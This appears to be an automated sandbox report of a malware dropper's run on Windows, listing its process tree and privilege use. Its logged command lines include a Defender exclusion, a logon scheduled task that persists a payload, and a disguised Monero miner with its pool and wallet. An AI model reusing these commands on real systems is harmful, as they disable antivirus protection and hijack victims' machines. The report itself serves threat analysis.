Wed15ac1df9305ded09.exeWed154a69e494d5e99ca.exepowershell.exeWed1529d8198a8f0c1.exetaskkill.exeultramediaburner.tmpShadowVPNInstaller_t1.exeWerFault.exeDownFlSetup110.exeVC_redist.x86.exeWed15566afaea59e.exeWed15e2f113a40ce5.exeBearVpn 3.exeSayma.exe8363683.scrtaskkill.exeWerFault.exedescription pid process Token: SeCreateTokenPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeAssignPrimaryTokenPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeLockMemoryPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeIncreaseQuotaPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeMachineAccountPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeTcbPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeSecurityPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeTakeOwnershipPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeLoadDriverPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeSystemProfilePrivilege 5072 Wed15ac1df9305ded09.exe Token: SeSystemtimePrivilege 5072 Wed15ac1df9305ded09.exe Token: SeProfSingleProcessPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeIncBasePriorityPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeCreatePagefilePrivilege 5072 Wed15ac1df9305ded09.exe Token: SeCreatePermanentPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeBackupPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeRestorePrivilege 5072 Wed15ac1df9305ded09.exe Token: SeShutdownPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeDebugPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeAuditPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeSystemEnvironmentPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeChangeNotifyPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeRemoteShutdownPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeUndockPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeSyncAgentPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeEnableDelegationPrivilege 5072 Wed15ac1df9305ded09.exe Token: SeManageVolumePrivilege 5072 Wed15ac1df9305ded09.exe Token: SeImpersonatePrivilege 5072 Wed15ac1df9305ded09.exe Token: SeCreateGlobalPrivilege 5072 Wed15ac1df9305ded09.exe Token: 31 5072 Wed15ac1df9305ded09.exe Token: 32 5072 Wed15ac1df9305ded09.exe Token: 33 5072 Wed15ac1df9305ded09.exe Token: 34 5072 Wed15ac1df9305ded09.exe Token: 35 5072 Wed15ac1df9305ded09.exe Token: SeDebugPrivilege 1320 Wed154a69e494d5e99ca.exe Token: SeDebugPrivilege 476 powershell.exe Token: SeDebugPrivilege 5036 Wed1529d8198a8f0c1.exe Token: SeDebugPrivilege 5976 taskkill.exe Token: SeDebugPrivilege 6048 ultramediaburner.tmp Token: SeIncBasePriorityPrivilege 4172 ShadowVPNInstaller_t1.exe Token: SeDebugPrivilege 4172 ShadowVPNInstaller_t1.exe Token: SeLoadDriverPrivilege 4172 ShadowVPNInstaller_t1.exe Token: SeRestorePrivilege 3204 WerFault.exe Token: SeBackupPrivilege 3204 WerFault.exe Token: SeBackupPrivilege 3204 WerFault.exe Token: SeDebugPrivilege 3024 DownFlSetup110.exe Token: SeDebugPrivilege 3596 VC_redist.x86.exe Token: SeDebugPrivilege 5352 Wed15566afaea59e.exe Token: SeDebugPrivilege 5560 Wed15e2f113a40ce5.exe Token: SeDebugPrivilege 3304 BearVpn 3.exe Token: SeDebugPrivilege 5636 Sayma.exe Token: SeDebugPrivilege 3228 8363683.scr Token: SeDebugPrivilege 6044 taskkill.exe Token: SeDebugPrivilege 4524 WerFault.exe Token: SeIncreaseQuotaPrivilege 476 powershell.exe Token: SeSecurityPrivilege 476 powershell.exe Token: SeTakeOwnershipPrivilege 476 powershell.exe Token: SeLoadDriverPrivilege 476 powershell.exe Token: SeSystemProfilePrivilege 476 powershell.exe Token: SeSystemtimePrivilege 476 powershell.exe Token: SeProfSingleProcessPrivilege 476 powershell.exe Token: SeIncBasePriorityPrivilege 476 powershell.exe Token: SeCreatePagefilePrivilege 476 powershell.exe Token: SeBackupPrivilege 476 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
setup_2.tmpultramediaburner.tmpinstaller.exemsedge.exepid process 2128 setup_2.tmp 6048 ultramediaburner.tmp 2800 installer.exe 5536 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
cmd.exepid process 2336 cmd.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3212 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4952 wrote to memory of 4928 4952 setup_x86_x64_install.exe setup_installer.exe PID 4952 wrote to memory of 4928 4952 setup_x86_x64_install.exe setup_installer.exe PID 4952 wrote to memory of 4928 4952 setup_x86_x64_install.exe setup_installer.exe PID 4928 wrote to memory of 3776 4928 setup_installer.exe setup_install.exe PID 4928 wrote to memory of 3776 4928 setup_installer.exe setup_install.exe PID 4928 wrote to memory of 3776 4928 setup_installer.exe setup_install.exe PID 3776 wrote to memory of 4136 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 4136 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 4136 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 3048 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 3048 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 3048 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 2816 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 2816 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 2816 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 988 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 988 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 988 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 2028 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 2028 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 2028 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 748 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 748 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 748 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 784 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 784 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 784 3776 setup_install.exe cmd.exe PID 2816 wrote to memory of 5036 2816 cmd.exe Wed1529d8198a8f0c1.exe PID 2816 wrote to memory of 5036 2816 cmd.exe Wed1529d8198a8f0c1.exe PID 2816 wrote to memory of 5036 2816 cmd.exe Wed1529d8198a8f0c1.exe PID 3776 wrote to memory of 4532 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 4532 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 4532 3776 setup_install.exe cmd.exe PID 3048 wrote to memory of 4520 3048 cmd.exe Wed151f5e3fd2.exe PID 3048 wrote to memory of 4520 3048 cmd.exe Wed151f5e3fd2.exe PID 3048 wrote to memory of 4520 3048 cmd.exe Wed151f5e3fd2.exe PID 3776 wrote to memory of 3336 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 3336 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 3336 3776 setup_install.exe cmd.exe PID 4136 wrote to memory of 476 4136 cmd.exe powershell.exe PID 4136 wrote to memory of 476 4136 cmd.exe powershell.exe PID 4136 wrote to memory of 476 4136 cmd.exe powershell.exe PID 2028 wrote to memory of 1320 2028 cmd.exe Wed154a69e494d5e99ca.exe PID 2028 wrote to memory of 1320 2028 cmd.exe Wed154a69e494d5e99ca.exe PID 3776 wrote to memory of 1120 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 1120 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 1120 3776 setup_install.exe cmd.exe PID 988 wrote to memory of 1112 988 cmd.exe Wed15228d911b9d5c.exe PID 988 wrote to memory of 1112 988 cmd.exe Wed15228d911b9d5c.exe PID 988 wrote to memory of 1112 988 cmd.exe Wed15228d911b9d5c.exe PID 3776 wrote to memory of 3884 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 3884 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 3884 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 3540 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 3540 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 3540 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 4820 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 4820 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 4820 3776 setup_install.exe cmd.exe PID 3884 wrote to memory of 1676 3884 cmd.exe Wed15e2f113a40ce5.exe PID 3884 wrote to memory of 1676 3884 cmd.exe Wed15e2f113a40ce5.exe PID 3884 wrote to memory of 1676 3884 cmd.exe Wed15e2f113a40ce5.exe PID 3776 wrote to memory of 3272 3776 setup_install.exe cmd.exe PID 3776 wrote to memory of 3272 3776 setup_install.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS043E7880\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed151f5e3fd2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed151f5e3fd2.exeWed151f5e3fd2.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1529d8198a8f0c1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed1529d8198a8f0c1.exeWed1529d8198a8f0c1.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3606193.scr"C:\Users\Admin\AppData\Roaming\3606193.scr" /S6⤵
-
C:\Users\Admin\AppData\Roaming\4950523.scr"C:\Users\Admin\AppData\Roaming\4950523.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2420799.scr"C:\Users\Admin\AppData\Roaming\2420799.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\4654129.scr"C:\Users\Admin\AppData\Roaming\4654129.scr" /S6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed154a69e494d5e99ca.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed154a69e494d5e99ca.exeWed154a69e494d5e99ca.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\inst3.exe"C:\Users\Admin\AppData\Local\Temp\inst3.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 3448⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 5368⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 5408⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 5208⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 4968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"installer.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-FN4C3.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-FN4C3.tmp\installer.tmp" /SL5="$30284,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\vc.exe/install /quiet8⤵
- Executes dropped EXE
-
C:\Windows\Temp\{8876892C-C40B-4D77-B51E-6494C2D5E843}\.cr\vc.exe"C:\Windows\Temp\{8876892C-C40B-4D77-B51E-6494C2D5E843}\.cr\vc.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc.exe" -burn.filehandle.attached=556 -burn.filehandle.self=560 /quiet9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\Temp\{0D2C1D5B-C79D-4F7E-964F-FB788418FD7E}\.be\VC_redist.x86.exe"C:\Windows\Temp\{0D2C1D5B-C79D-4F7E-964F-FB788418FD7E}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{B2E6B517-1C53-45A3-BA56-89873AB964EE} {B2E83090-4CE3-46A2-876D-8C102D33C912} 564810⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 136810⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 7688⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 5088⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 8288⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 5088⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 8528⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 8688⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 8488⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 8968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 8448⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\Install.EXE"C:\Users\Admin\AppData\Local\Temp\Install.EXE"7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zSE896.tmp\Install.cmd" "9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1NEph710⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac20471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2280 /prefetch:211⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:111⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4144 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4144 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5444 /prefetch:211⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4428 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2268,8842187710005991907,14896180882985217490,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:111⤵
-
